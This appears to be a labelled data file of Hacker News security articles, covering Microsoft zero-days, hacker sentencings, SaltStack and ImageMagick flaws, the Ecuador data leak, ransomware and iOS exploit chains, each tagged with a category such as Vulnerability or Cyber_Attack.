These patch updates address security flaws in Microsoft Windows, Internet Explorer, Microsoft Edge, Microsoft Office, Microsoft Office Exchange Server, Outlook, .NET Framework, Microsoft Hyper-V, ChakraCore, Azure IoT SDK, and more.
1) Double Kill IE 0-day Vulnerability
The first zero-day vulnerability (CVE-2018-8174) under active attack is a critical remote code execution vulnerability that was revealed by Chinese security firm Qihoo 360 last month and affected all supported versions of Windows operating systems.
Dubbed ""Double Kill"" by the researchers, the vulnerability is notable and requires prompt attention as it could allow an attacker to remotely take control over an affected system by executing malicious code remotely through several ways, such as a compromised website, or malicious Office documents.
The Double Kill vulnerability is a use-after-free issue which resides in the way the VBScript Engine (included in all currently supported versions of Windows) handles objects in computer memory, allowing attackers to execute code that runs with the same system privileges as of the logged-in user.
""In a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website. An attacker could also embed an ActiveX control marked 'safe for initialization' in an application or Microsoft Office document that hosts the IE rendering engine,"" Microsoft explains in its advisory.
""The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.""
Users with administrative rights on their systems are impacted more than the ones with limited rights, as an attacker successfully exploiting the vulnerability could take control of an affected system.
However, that doesn't mean that low-privileged users are spared. If users are logged in on an affected system with more limited rights, attackers may still be able to escalate their privileges by exploiting a separate vulnerability.
Researchers from Qihoo 360 and Kaspersky Labs found that the vulnerability was actively being exploited in the wild by an advanced state-sponsored hacking group in targeted attacks, but neither Microsoft nor Qihoo 360 and Kaspersky provided any information on the threat group.
2) Win32k Elevation of Privilege Vulnerability
The second zero-day vulnerability (CVE-2018-8120) patched this month is a privilege-escalation flaw that occurred in the Win32k component of Windows when it fails to properly handle objects in computer memory.
Successful exploitation of the flaw can allow attackers to execute arbitrary code in kernel mode, eventually allowing them to install programs or malware; view, edit or delete data; or create new accounts with full user rights.
The vulnerability is rated ""important,"" and only affects Windows 7, Windows Server 2008 and Windows Server 2008 R2. The issue has actively been exploited by threat actors, but Microsoft did not provide any detail about the in-the-wild exploits.
Two Publicly Disclosed Flaws
Microsoft also addressed two ""important"" Windows vulnerabilities whose details have already been made public.
One of these is a Windows kernel flaw (CVE-2018-8141) that could lead to information disclosure, and the other is a Windows Image bug (CVE-2018-8170) that could lead to Elevation of Privilege.
In addition, the May 2018 updates resolve 20 more critical issues, including memory corruptions in the Edge and Internet Explorer (IE) scripting engines and remote code execution (RCE) vulnerabilities in Hyper-V and Hyper-V SMB.
Meanwhile, Adobe has also released its Patch Tuesday updates, addressing five security vulnerabilities—one critical bug in Flash Player, one critical and two important flaws in Creative Cloud and one important bug in Connect.
Users are strongly advised to install security updates as soon as possible in order to protect themselves against the active attacks in the wild.
For installing security updates, head on to Settings → Update & security → Windows Update → Check for updates, or you can install the updates manually.
",Cyber_Attack
"Hacker Who Hacked US Spy Chief, FBI & CIA Director Gets 5-Year in Prison",https://thehackernews.com/2017/09/crackas-with-attitude-hackers.html,"Remember ""Crackas With Attitude""?
The hacking group behind a series of embarrassing hacks that targeted personal email accounts of senior officials at the FBI, the CIA, and the White House, among other United States federal agencies in 2015.
A member of Crackas With Attitude, who was arrested last year in September, has now been sentenced to five years in federal prison.
Justin Liverman, a 25-year-old man from Morehead City, who was known under the online alias ""D3F4ULT,"" was arrested last year along with another member of the group—Andrew Otto Boggs, 23, of North Wilkesboro, who allegedly used the handle ""INCURSIO.""
The duo hacked into multiple government organizations between October 2015 and February 2016. Boggs was sentenced to two years in prison on June 30, 2017, for his role.
Liverman pleaded guilty on January 6 this year to conspiracy to hack U.S. government computers and accounts and was sentenced to 5 years in prison on Friday. He will also be forced to pay $145,000 in restitution.
According to the plea agreement, ""beginning in November 2015, Liverman conspired to attempt to intimidate and harass U.S. officials and their families by gaining unauthorized access to victims' online accounts, among other things.""
""Liverman publicly posted online documents and personal information unlawfully obtained from a victim's personal account; sent threatening text messages to the same victim's cellphone; and paid an unlawful 'phonebombing' service to call the victim repeatedly with a threatening message,"" U.S. prosecutors in the Eastern District Court of Virginia said.
Crackas With Attitude targeted more than ten U.S. government officials including the following and caused more than $1.5 million in losses to victims:
Hacked into the AOL email of former CIA director John Brennan and released personal details.
Hacked into the personal emails and phone accounts of the former US spy chief James Clapper.
Broke into the AOL email of the Ex FBI Deputy Director Mark Giuliano.
The hacking group also leaked the personal details of 31,000 government agents belonging to almost 20,000 FBI agents, 9,000 Department of Homeland Security officers, and some number of DoJ staffers.
According to the federal officials, the hacking group used social engineering to trick victims into revealing their account numbers, passwords, and other sensitive details, using which they gained access to their accounts.
However, a 17-year-old British teenager, who is known as CRACKA and the leader of the ""Crackas With Attitude"" hacking group, is actually responsible for carrying out the above attacks. His prosecution is still ongoing in the United Kingdom.
",Cyber_Attack
Google App Engine — More than 30 Vulnerabilities Discovered,https://thehackernews.com/2014/12/google-app-engine-hosting-security.html,"Security researchers have discovered a number of critical vulnerabilities in the Java environment of the Google App Engine (GAE) that enables attackers to bypass critical security sandbox defenses.
Google App Engine is Google's PaaS (Platform as a Service) Cloud computing Platform for developing and hosting web applications in Google-managed data centers. GAE offers to run custom-built programs using a wide variety of popular languages and frameworks, out of which many are built on the Java environment.
The vulnerabilities was reported by Security Explorations, the same security research company that carried out multiple researches related to Java in past. The discovery was announced on the Full Disclosure security mailing list by Adam Gowdiak, founder and CEO of Security Explorations.
According to the security firm, the flaws can be exploited by attackers to achieve a complete Java VM security sandbox escape, as well as to execute an arbitrary code. The researchers estimate that the number of issues is ""30+ in total.""
By exploiting the vulnerabilities, security researchers were able to bypass Google App Engine whitelisting of JRE Classes and gain access to full JRE (Java Runtime Environment). They discovered 22 full Java VM security sandbox escape issues and were able to exploit 17 of them successfully.
Moreover, the researchers were able to execute native code, specifically to issue arbitrary library/system calls and to gain access to the files (binary/classes) comprising the JRE sandbox. They even siphoned off DWARF information from binary files, PROTOBUF definitions from Java classes and PROTOBUF definition from binary files among others.
However, the researchers have been unable to finish their research because Google suspended their test Google App Engine account.
""Unfortunately, we cannot complete our work due to the suspension of the ""test"" GAE account that took place today,"" Gowdiak wrote. ""Without any doubt this is an opsec failure on our end (this week we did poke a little bit more aggressively around the underlying OS sandbox / issued various system calls in order to learn more about the nature of the error code 202, the sandbox itself, etc.).""
As Google has generally been supportive and helpful to the security research community, Researchers at the security firm believes that Google will allow them to complete their research and re-enable their Google App Engine account.
",Vulnerability
"To Protect Your Devices, A Hacker Wants to Hack You Before Someone Else Does",https://thehackernews.com/2017/04/vigilante-hacker-iot-botnet.html,"It should be noted that hacking a system for unauthorised access that does not belong to you is an illegal practice, no matter what's the actual intention behind it.
Now I am pointing out this because reportedly someone, who has been labeled as a 'vigilante hacker' by media, is hacking into vulnerable 'Internet of Things' devices in order to supposedly secure them.
This is not the first time when any hacker has shown vigilance, as we have seen lots of previous incidents in which hackers have used malware to compromise thousands of devices, but instead of hacking them, they forced owners to make them secure.
Dubbed Hajime, the latest IoT botnet malware, used by the hacker, has already infected at least 10,000 home routers, Internet-connected cameras, and other smart devices.
But reportedly, it's an attempt to wrestle their control from Mirai and other malicious threats.
Mirai is an IoT botnet that threatened the Internet last year with record-setting distributed denial-of-service attacks against the popular DNS provider Dyn last October. The botnet designed to scan for IoT devices that are still using default passwords.
How the Hajime IoT Botnet Works
Hajime botnet works much like Mirai — it spreads via unsecured IoT devices that have open Telnet ports and uses default passwords — and also uses the same list of username and password combinations that Mirai botnet is programmed to use, with the addition of two more.
However, what's interesting about Hajime botnet is that, unlike Mirai, it secures the target devices by blocking access to four ports (23, 7547, 5555, and 5358) known to be vectors used to attack many IoT devices, making Mirai or other threats out of their bay.
Unlike Mirai, Hajime uses a decentralized peer-to-peer network (instead of command and control server) to issue commands and updates to infected devices, which makes it more difficult for ISPs and Internet backbone providers to take down the botnet.
Hajime botnet also takes steps to hide its running processes and files on the file system, making the detection of infected systems more difficult.
Besides this, Hajime botnet also lacks DDoS capabilities or any other hacking code except for the propagation code that lets one infected device search for other vulnerable devices and infects them.
One of the most interesting things about Hajime: the botnet displays a cryptographically signed message every 10 minutes or so on terminals. The message reads:
Just a white hat, securing some systems.
Important messages will be signed like this!
Hajime Author.
Contact CLOSED Stay sharp!
There's Nothing to Get Excited
No doubt, there's a temptation to applaud Hajime, but until users don't reboot their hacked devices.
Since Hajime has no persistence mechanism, which gets loaded into the devices' RAM, once the IoT device is rebooted, it goes back to its unsecured state, complete with default passwords and the Telnet port open to the world.
""One day a device may belong to the Mirai botnet, after the next reboot it could belong to Hajime, then the next any of the many other IoT malware/worms that are out there scanning for devices with hard coded passwords. This cycle will continue with each reboot until the device is updated with a newer, more secure firmware,"" the Symantec researchers explained.
There's another problem...
Hacking someone to prevent hacking is not a thing, that's why we are also concerned about a related amendment passed by the United States — Rule 41 — which grants the FBI much greater powers to legally break into computers belonging to any country, take data, and engage in remote surveillance.
So, the most concerning issue of all — Is there any guarantee that the author of Hajime will not add attack capabilities to the worm to use the hijacked devices for malicious purposes?
",Cyber_Attack
IT Firm Manager Arrested in the Biggest Data Breach Case of Ecuador's History,https://thehackernews.com/2019/09/ecuador-data-breach.html,"Ecuador officials have arrested the general manager of IT consulting firm Novaestrat after the personal details of almost the entire population of the Republic of Ecuador left exposed online in what seems to be the most significant data breach in the country's history.
Personal records of more than 20 million adults and children, both dead and alive, were found publicly exposed on an unsecured Elasticsearch server by security firm vpnMentor, which made the discovery during its large-scale mapping project.
For a country with a population of over 16 million people, the breach exposed details of almost every Ecuadorian citizen, including President Lenín Moreno as well as WikiLeaks CEO Julian Assange, who was given political asylum in the country in 2012.
The unsecured Elasticsearch server, which was based in Miami and owned by Ecuadorian company Novaestrat, contained 18GB cache of data appeared to have come from a variety of sources including government registries, an automotive association called Aeade, and an Ecuadorian national bank called Biess.
Data Breach Exposes Personal Data of Almost Entire Ecuador Population
The cache reportedly contained everything from full names, gender, dates and places of birth, phone numbers and addresses, to marital statuses, national identification numbers (similar to social security numbers), employment information, and details of education.
The cache also contained specific financial information related information to accounts held with the Ecuadorian national bank Biess, including person's bank account statuses, current balances and credit type, along with detailed information about individuals' family members.
vpnMentor notified the Ecuadorian Computer Incident Response Center (EcuCERT) of the breach, who then immediately informed Novaestrat, the online data consulting firm in the city of Esmeraldas who owned the unsecured server, which was later taken offline on September 11.
Authorities Investigating Company Allegedly Responsible for the Leak
As part of the investigation, Ecuadorian officials also said in a statement on Tuesday that they had arrested the manager of Novaestrat identified as William Roberto G and seized electronic equipment, computers, storage devices, and documentation during a raid at his home.
Roberto has been taken to the Ecuadorian capital, Quito, by the authorities for questioning and may face criminal charges.
Also, given the privacy concerns surrounding the incident, the country's Minister of Telecommunications said legal actions would be taken against the affected institutions to sanction private companies responsible for violating privacy and publicizing personal information without authorization.
The Minister of Telecommunications also said it is planning to pass a new data privacy law in the country, which they have been working for the past eight months, to protect the personal data of its citizens.
This is not the first time when the country has suffered a significant data security breach.
In 2016, hackers managed to steal $12 million from an Ecuadorian bank, Banco del Austro (BDA), by breaching its Swift payment system.
However, the latest Ecuador's breach recalled Bulgaria history's biggest data breach that took place on July 2019 and exposed personal and financial information of 5 million adult Bulgarian citizens out of its total population of 7 million people—that's over 70% of the country's population.
",Data_Breaches
Critical SaltStack RCE Bug (CVSS Score 10) Affects Thousands of Data Centers,https://thehackernews.com/2020/05/saltstack-rce-vulnerability.html,"Two severe security flaws have been discovered in the open-source SaltStack Salt configuration framework that could allow an adversary to execute arbitrary code on remote servers deployed in data centers and cloud environments.
The vulnerabilities were identified by F-Secure researchers earlier this March and disclosed on Thursday, a day after SaltStack released a patch (version 3000.2) addressing the issues, rated with CVSS score 10.
""The vulnerabilities, allocated CVE IDs CVE-2020-11651 and CVE-2020-11652, are of two different classes,"" the cybersecurity firm said.
""One being authentication bypass where functionality was unintentionally exposed to unauthenticated network clients, the other being directory traversal where untrusted input (i.e., parameters in network requests) was not sanitized correctly allowing unconstrained access to the entire filesystem of the master server.""
The researchers warned that the flaws could be exploited in the wild imminently. SaltStack is also urging users to follow the best practices to secure the Salt environment.
Vulnerabilities in ZeroMQ Protocol
Salt is a powerful Python-based automation and remote execution engine that's designed to allow users to issue commands to multiple machines directly.
Built as a utility to monitor and update the state of servers, Salt employs a master-slave architecture that automates the process of pushing out configuration and software updates from a central repository using a ""master"" node that deploys the changes to a target group of ""minions"" (e.g., servers) en masse.
The communication between a master and minion occurs over the ZeroMQ message bus. Additionally, the master uses two ZeroMQ channels, a ""request server"" to which minions report the execution results and a ""publish server,"" where the master publishes messages that the minions can connect and subscribe to.
According to F-Secure researchers, the pair of flaws reside within the tool's ZeroMQ protocol.
""The vulnerabilities described in this advisory allow an attacker who can connect to the 'request server' port to bypass all authentication and authorization controls and publish arbitrary control messages, read and write files anywhere on the 'master' server filesystem and steal the secret key used to authenticate to the master as root,"" the researchers said.
""The impact is full remote command execution as root on both the master and all minions that connect to it.""
In other words, an attacker can exploit the flaws to call administrative commands on the master server as well as queue messages directly on the master publish server, thereby allowing the salt minions to run malicious commands.
What's more, a directory traversal vulnerability identified in the wheel module — which has functions to read and write files to specific locations — can permit reading of files outside of the intended directory due to a failure to properly sanitize file paths.
Detecting Vulnerable Salt Masters
F-Secure researchers said an initial scan revealed more than 6,000 vulnerable Salt instances exposed to the public internet.
Detecting possible attacks against susceptible masters, therefore, entails auditing published messages to minions for any malicious content. ""Exploitation of the authentication vulnerabilities will result in the ASCII strings ""_prep_auth_info"" or ""_send_pub"" appearing in data sent to the request server port (default 4506),"" it added.
It's highly recommended that Salt users update the software packages to the latest version.
""Adding network security controls that restrict access to the salt master (ports 4505 and 4506 being the defaults) to known minions, or at least block the wider Internet, would also be prudent as the authentication and authorization controls provided by Salt are not currently robust enough to be exposed to hostile networks,"" the researchers said.
",Vulnerability
"vBulletin Forum hacked with Zero Day vulnerability, caused Macrumors Forum Data breach",https://thehackernews.com/2013/11/vBulletin-hacked-Zero-Day-vulnerability.html,"Last Tuesday, Popular Mac news website MacRumors's user forums was hacked and forum database has been compromised including the username, email and passwords belonging to all 860,000 registered users.
Yesterday, Inj3ct0r Team of Exploit Database website 1337Day claimed the responsibility for the hack and also claimed that they have also hacked the official website of vBulletin Forum using a Zero Day exploit.
""Macrumors.com was based on vBulletin CMS. We use our 0day exploit vBulletin, got password moderator. 860000 user data hacked too. The network security is a myth"" he told me.
During the conversation, team leader told me that he has discovered a Zero Day Remote Code Execution vulnerability in vBulletin v4.x.x and 5.х.x, that allows an attacker to execute arbitrary code on the server end remotely.
On their exploit marketplace they are also selling this zero day exploit with Shell Upload payload at $7000 USD. ""We found a critical vulnerability in all vBulletin versions 4.x.x and 5.х.x. We have successfully uploaded our shell on the official vbulletin server and dumped their database after getting root access. All those wishing to buy this vulnerability and patch their forums can get the exploit from our site."" he added.
For proof of concept, they have shared some screenshots of vBulletin database and server shell, as shown below:
The official vBulletin team also admitted the breach and issued a warning note via e-mail and company forum post, urged customers to change their passwords as soon as possible.
""Very recently, our security team discovered sophisticated attacks on our network, involving the illegal access of forum user information, possibly including your password.""
However, if somehow credentials are compromised of such forums or sites, many people use the same passwords for their other accounts, which provides the attacker with a much easier way to compromising the highest value targets. So always, please use different passwords for different websites.
Update : World biggest Hacking Conference DEF CON forum also goes down because of the vBulletin zero day exploit in the wild.
""We have disabled the forums until there is resolution on a possible vulnerability. Once we have a fix/patch installed, we'll re-open service. Thanks! Sorry about the down-time.""
",Vulnerability
Ransomware Virus Shuts Down Electric and Water Utility,https://thehackernews.com/2016/04/power-ransomware-attack.html,"Ransomware has become an albatross around the neck, targeting businesses, hospitals, and personal computers worldwide and extorting Millions of Dollars.
Typical Ransomware targets victim's computer encrypts files on it, and then demands a ransom -- typically about $500 in Bitcoin -- in exchange for a key that will decrypt the files.
Guess what could be the next target of ransomware malware?
Everything that is connected to the Internet.
There is a huge range of potential targets, from the pacemaker to cars to Internet of the Things, that may provide an opportunity for cybercriminals to launch ransomware attacks.
Recently, the American public utility Lansing Board of Water & Light (BWL) has announced that the company has become a victim of Ransomware attack that knocked the utility's internal computer systems offline.
Also Read: FBI Suggests Ransomware Victims — 'Just Pay the Ransom'.
The attack took place earlier this week when one of the company's employees opened a malicious email attachment.
Once clicked, the malware installed on the computer and quickly began encrypting the organization's files, according to the Lansing State Journal.
BWL quickly decided to shut down its networks and suspend some services, including accounting and email service for its about 250 employees, in order to prevent further damages. Power and water shut-offs by BWL was also suspended.
Though the ransomware type is still unknown, the utility is currently working with the Federal Bureau of Investigation (FBI) and local law enforcement authorities to investigate the incident.
The company assured its 96,000 customers that no personal information related to its customers or employees has been compromised by the ransomware intrusion into the corporate computer network.
However, it is not yet clear whether the utility paid the Ransom in exchange of its data. The company said law enforcement has limited it from discussing the issue in public, at least for now.
",Cyber_Attack
"Paunch, the author of Blackhole Exploit kit arrested in Russia",https://thehackernews.com/2013/10/paunch-author-of-blackhole-exploit-kit.html,"According to a Security Analyst 'Maarten Boone' working at Fox-IT company, the Developer of notorious Blackhole Exploit Kit developer 'Paunch' and his partners were arrested in Russia recently.
Blackhole Exploit Kit which is responsible for the majority of web attacks today, is a crimeware that makes it simple for just about anyone to build a botnet.
This Malware kit was developed by a hacker who uses the nickname ""Paunch"" and his Team, has gained wide adoption and is currently one of the most common exploit frameworks used for Web-based malware delivery.
The Blackhole exploit kit is a framework for delivering exploits via compromised or third-party websites, serve up a range of old and new exploits for Oracle's Java, Adobe's Flash and other popular software to take control of victim's machines.
It the point of writing No Police Authority or Press has confirmed the claim made by Maarten about the arrest of Malware author. Please Stay tuned to THN for updates about the Story.
In April, 2013 - Russian hackers and developers behind the Carberp botnet, that stole millions from bank accounts worldwide were also arrested.
",Malware
18-Year-Old Hacker Gets 3 Years in Prison for Massive Twitter 'Bitcoin Scam' Hack,https://thehackernews.com/2021/03/18-year-old-hacker-gets-3-years-in.html,"A Florida teen accused of masterminding the hacks of several high-profile Twitter accounts last summer as part of a widespread cryptocurrency scam pled guilty to fraud charges in exchange for a three-year prison sentence.
Graham Ivan Clark, 18, will also serve an additional three years on probation.
The development comes after the U.S. Department of Justice (DoJ) charged Mason Sheppard (aka Chaewon), Nima Fazeli (aka Rolex), and Clark (then a juvenile) with conspiracy to commit wire fraud and money laundering.
Specifically, 30 felony charges were filed against Clark, including one count of organized fraud, 17 counts of communications fraud, one count of fraudulent use of personal information with over $100,000 or 30 or more victims, 10 counts of fraudulent use of personal information, and one count of access to computer or electronic device without authority.
On July 15, 2020, Twitter suffered one of the biggest security lapses in its history after the attackers managed to hijack nearly 130 high-profile Twitter accounts pertaining to politicians, celebrities, and musicians, including that of Barack Obama, Kanye West, Joe Biden, Bill Gates, Elon Musk, Jeff Bezos, Warren Buffett, Uber, and Apple.
The broadly targeted hack posted similarly worded messages urging millions of followers of each profile to send money to a specific bitcoin wallet address in return for larger payback. The scheme netted about $117,000 in bitcoin before it was shut down.
Subsequent investigation into the incident revealed that Clark and the other attackers seized the accounts after stealing Twitter employees' credentials through a successful phone spear-phishing attack, subsequently using them to gain access to the company's internal network and account support tools, change user account settings, and take over control.
""By obtaining employee credentials, they were able to target specific employees who had access to our account support tools. They then targeted 130 Twitter accounts - Tweeting from 45, accessing the DM inbox of 36, and downloading the Twitter Data of 7,"" the company said on July 31.
Additionally, the three individuals attempted to monetize this entrenched access by selling the hijacked accounts on OGUsers, a forum notorious for peddling access to social media and other online accounts.
In light of the hacks, Twitter said it's making security improvements aimed at detecting and preventing inappropriate access to its internal systems, which were used by more than 1,000 employees and contractors as of early 2020.
""He took over the accounts of famous people, but the money he stole came from regular, hard-working people,"" Hillsborough State Attorney Andrew Warren said in a statement. ""Graham Clark needs to be held accountable for that crime, and other potential scammers out there need to see the consequences.""
""In this case, we've been able to deliver those consequences while recognizing that our goal with any child, whenever possible, is to have them learn their lesson without destroying their future.""
",Cyber_Attack
Windows Error Crash Reports or Treasure of Zero-Day vulnerabilities for NSA?,https://thehackernews.com/2014/01/windows-error-crash-reports-or-treasure.html,"I am sure that you all have been familiar with the above shown annoying Window Operating System error messages that many times pop ups on your screen while working on the system in case of process failure i.e. ""The system has recovered from a serious error. A log of this error has been created. Please tell Microsoft about this problem""
The message that prompts ask the user to report the problem to Microsoft followed by the options to Send an error report or Not send. Most of the time Gentle users like you and me used to submit these error reports to aware the Microsoft about the problem. But What if these crash reports can be abused to identify the vulnerabilities of your system for Spying?
NSA is intercepting wide range of Internet Traffic including many Encrypted connections and naturally unencrypted also and surprisingly, by default Microsoft encrypts its reports, but the messages are transmitted unencrypted or over standard HTTP connections to watson.microsoft.com.
The latest revelations from the Snowden document leaks revealed by the German publication Der Spiegel described how the NSA's secret hacking unit called Tailored Access Operations Unit, or TAO Unit, breaking into a windows computer by gaining passive access to machines.
Der Spiegel's explains:
The automated crash reports are a ""neat way"" to gain ""passive access"" to a machine, the presentation continues. Passive access means that, initially, the only data the computer sends out into the Internet is captured and saved, but the computer itself is not yet manipulated. Still, even this passive access to error messages provides valuable insights into problems with a targeted person's computer and, thus, information on security holes that might be exploitable for planting malware or spyware on the unwitting victim's computer.
Microsoft has Windows Error Reporting (a.k.a. Dr. Watson) technology from Windows XP to later versions. Windows crash reports give up all kinds of information about your system, allowing them to know what software is installed on your PC, respective versions and whether the programs or OS have been patched.
Websense Security Firm observed the Windows Error Reporting system and find that it sends out its crash logs in the clear text:
This information includes:
Date
USB Device Manufacturer
USB Device Identifier
USB Device Revision
Host computer - default language
Host computer - Operating system, service pack and update version
Host computer - Manufacturer, model and name
Host computer - Bios version and unique machine identifier
Why should we care about this? Because System or application Crashes signal about various possible Zero-day vulnerabilities that could be exploited and this is the exact information that the NSA or anyone else needs when tailoring a specific attack against your system, or when designing some kind of malware to infect it.
Der Spiegel also added:
When TAO selects a computer somewhere in the world as a target and enters its unique identifiers (an IP address, for example) into the corresponding database, intelligence agents are then automatically notified any time the operating system of that computer crashes and its user receives the prompt to report the problem to Microsoft. An internal presentation suggests it is NSA's powerful XKeyscore spying tool that is used to fish these crash reports out of the massive sea of Internet traffic.
A Microsoft spokesperson asked to comment on the reports said, ""Microsoft does not provide any government with direct or unfettered access to our customer's data. We would have significant concerns if the allegations about government actions are true.""
Websense also recommends that Error report data should be encrypted with SSL at a minimum, ideally using TLS 1.2 in order to prevent it from NSA snooping. Alexander Watson, director of security research, Websense, will be presenting advanced findings related to this research at the 2014 RSA Conference in San Francisco.
How To Disable Error Reporting:
If you want to disable Windows Error Reporting, open Control Panel and search for ""Problem reporting settings"". Open that option and Select ""Never check for solutions."" However Microsoft does not recommend users do so, but it's your choice, neither it harms your system.
",Vulnerability
Warning — Widely Popular ImageMagick Tool Vulnerable to Remote Code Execution,https://thehackernews.com/2016/05/imagemagick-exploit-hack.html,"A serious zero-day vulnerability has been discovered in ImageMagick, a widely popular software tool used by a large number of websites to process user's photos, which could allow hackers to execute malicious code remotely on servers.
ImageMagick is an open-source image processing library that lets users resize, scale, crop, watermarking and tweak images.
The ImageMagick tool is supported by many programming languages, including Perl, C++, PHP, Python, Ruby and is being deployed by Millions of websites, blogs, social media platforms, and popular content management systems (CMS) such as WordPress and Drupal.
Slack security engineer Ryan Huber disclosed a zero-day flaw (CVE-2016–3714) in the ImageMagick image processing library that allows a hacker to execute malicious code on a Web server by uploading maliciously-crafted image.
For example, by uploading a booby-trapped selfie to a web service that uses ImageMagick, an attacker can execute malicious code on the website's server and steal critical information, snoop on user's accounts and much more.
In other words, only those websites are vulnerable that make use of ImageMagick and allow their users to upload images.
The exploit for the vulnerability has been released and named: ImageTragick.
""The exploit for this vulnerability is being used in the wild,"" Huber wrote in a blog post published Tuesday. ""The exploit is trivial, so we expect it to be available within hours of this post.""
He added ""We have collectively determined that these vulnerabilities are available to individuals other than the person(s) who discovered them. An unknowable number of people having access to these vulnerabilities makes this a critical issue for everyone using this software.""
The ImageMagick team has also acknowledged the flaw, saying the recent ""vulnerability reports … include possible Remote Code Execution and ability to render files on the local system.""
Though the team has not rolled out any security patches, it recommended that website administrators should add several lines of code to configuration files in order to block attacks, at least via the possible exploits.
Web administrators are also recommended to check the 'magic bytes' in files sent to ImageMagick before allowing the image files to be processed on their end.
Magic bytes are the first few bytes of a file used to identify the image type, such as GIF, JPEG, PNG.
The vulnerability will be patched in versions 7.0.1-1 and 6.9.3-10 of ImageMagick, which are due to be released by the weekend.
",Vulnerability
XSS Vulnerability on Real Player Website by THEc7cREW,https://thehackernews.com/2011/05/xss-vulnerability-on-real-player.html,"XSS Vulnerability on Real Player Website by THEc7cREW
THEc7cREW Found XSS Vulnerability on Real Player Website , Click Here to See the POC.
",Vulnerability
Chrome Bug Allowed Hackers to Find Out Everything Facebook Knows About You,https://thehackernews.com/2018/08/google-chrome-vulnerability.html,"With the release of Chrome 68, Google prominently marks all non-HTTPS websites as 'Not Secure' on its browser to make the web a more secure place for Internet users.
If you haven't yet, there is another significant reason to immediately switch to the latest version of the Chrome web browser.
Ron Masas, a security researcher from Imperva, has discovered a vulnerability in web browsers that could allow attackers to find everything other web platforms, like Facebook and Google, knows about you—and all they need is just trick you into visiting a website.
The vulnerability, identified as CVE-2018-6177, takes advantage of a weakness in audio/video HTML tags and affects all web browsers powered by ""Blink Engine,"" including Google Chrome.
To illustrate the attack scenario, the researcher took an example of Facebook, a popular social media platform that collects in-depth profiling information on its users, including their age, gender, where you have been (location data) and interests, i.e., what you like and what you don't.
You must be aware of Facebook offering post targeting feature to page administrators, allowing them to define a targeted or restricted audience for specific posts based on their age, location, gender, and interest.
How the Browser Attack Works?
To demonstrate the vulnerability, the researcher created multiple Facebook posts with different combinations of the restricted audiences to categorize victims according to their age, location, interest or gender.
Now, if a website embeds all these Facebook posts on a web page, it will load and display only a few specific posts at the visitors' end based on individuals' profile data on Facebook that matches restricted audience settings.
For example, if a post—defined to be visible only to the Facebook users with age 26, male, having interest in hacking or Information Security—was loaded successfully, an attacker can potentially learn personal information on visitors, regardless of their privacy settings.
Though the idea sounds exciting and quite simple, there are no direct ways available for site administrators to determine whether an embedded post was loaded successfully for a specific visitor or not.
Thanks to Cross-Origin Resource Sharing (CORS)—a browser security mechanism that prevents a website from reading the content of other sites without their explicit permission.
However, Imperva researcher found that since audio and video HTML tags don't validate the content type of fetched resources or reject responses with invalid MIME types, an attacker can use multiple hidden video or audio tags on a website to request Facebook posts.
Though this method doesn't display Facebook posts as intended, it does allow the attacker-controlled website to measure (using JavaScript) the size of cross-origin resources and number of requests to find out which specific posts were successfully fetched from Facebook for an individual visitor.
""With several scripts running at once — each testing a different and unique restriction — the bad actor can relatively quickly mine a good amount of private data about the user,"" Masses said.
""I found that by engineering sites to return a different response size depending on the currently logged user properties it is possible to use this method to extract valuable information.""
A member from Google security team also pointed that the vulnerability could also work against websites using APIs to fetch user session specific information.
The core of this vulnerability has some similarities with another browser bug, patched in June this year, which exploited a weakness in how web browsers handle cross-origin requests to video and audio files, allowing attackers to read the content of your Gmail or private Facebook messages.
Imperva researcher reported the vulnerability to Google with a proof of concept exploit, and the Chrome team patched the issue in Chrome 68 release.
So, Chrome users are strongly recommended to update their browser to the latest version, if they haven't yet.
",Vulnerability
Google Uncovers How Just Visiting Some Sites Were Secretly Hacking iPhones For Years,https://thehackernews.com/2019/08/hacking-iphone-ios-exploits.html,"Beware Apple users!
Your iPhone can be hacked just by visiting an innocent-looking website, confirms a terrifying report Google researchers released earlier today.
The story goes back to a widespread iPhone hacking campaign that cybersecurity researchers from Google's Project Zero discovered earlier this year in the wild, involving at least five unique iPhone exploit chains capable of remotely jailbreaking an iPhone and implanting spyware on it.
Those iOS exploit chains were found exploiting a total of 14 separate vulnerabilities in Apple's iOS mobile operating system—of which 7 flaws resided in Safari web browser, 5 in the iOS kernel and 2 separate sandbox escape issues—targeting devices with almost every version in that time-frame from iOS 10 through to the latest version of iOS 12.
According to a deep-dive blog post published by Project Zero researcher Ian Beer, only two of the 14 security vulnerabilities were zero-days, CVE-2019-7287 and CVE-2019-7286, and unpatched at the time of discovery—and surprisingly, the campaign remained undetected for at least two years.
Though the technical details and background story of both then-zero-day vulnerabilities were not available at that time, The Hacker News warned about both the flaws in February after Apple released iOS version 12.1.4 to address them.
""We reported these issues to Apple with a 7-day deadline on 1 Feb 2019, which resulted in the out-of-band release of iOS 12.1.4 on 7 Feb 2019. We also shared the complete details with Apple, which were disclosed publicly on 7 Feb 2019,"" Beer says.
Now, as Google researcher explained, the attack was being carried out through a small collection of hacked websites with thousands of visitors per week, targeting every iOS user landing on those websites without discrimination.
""Simply visiting the hacked site was enough for the exploit server to attack your device, and if it was successful, install a monitoring implant,"" Beer says.
Once an iPhone user visited one of the hacked websites through the vulnerable Safari web browser, it triggered WebKit exploits for each exploit chain in an attempt to gain an initial foothold onto the user's iOS device and stage the privilege escalation exploits to further gain root access to the device, which is the highest level of access.
The iPhone exploits were used to deploy an implant primarily designed to steal files like iMessages, photos, and live GPS location data of users, and upload them to an external server every 60 seconds.
""There is no visual indicator on the device that the implant is running. There's no way for a user on iOS to view a process listing, so the implant binary makes no attempt to hide its execution from the system,"" Beers explains.
The spyware implant also stole the database files from the victim's device used by popular end-to-end encryption apps like Whatsapp, Telegram, and iMessage to store data, including private chats in the plaintext.
In addition, the implant also had access to users' device's keychain data containing credentials, authentication tokens, and certificates used on and by the device.
""The keychain also contains the long-lived tokens used by services such as Google's iOS Single-Sign-On to enable Google apps to access the user's account. These will be uploaded to the attackers and can then be used to maintain access to the user's Google account, even once the implant is no longer running,"" Beers says.
While the implant would be automatically wiped off from an infected iPhone upon rebooting thereby leaving no trace of itself, visiting the hacked site again would reinstall the implant.
Alternatively, as Beer explains, the attackers may ""nevertheless be able to maintain persistent access to various accounts and services by using the stolen authentication tokens from the keychain, even after they lose access to the device.""
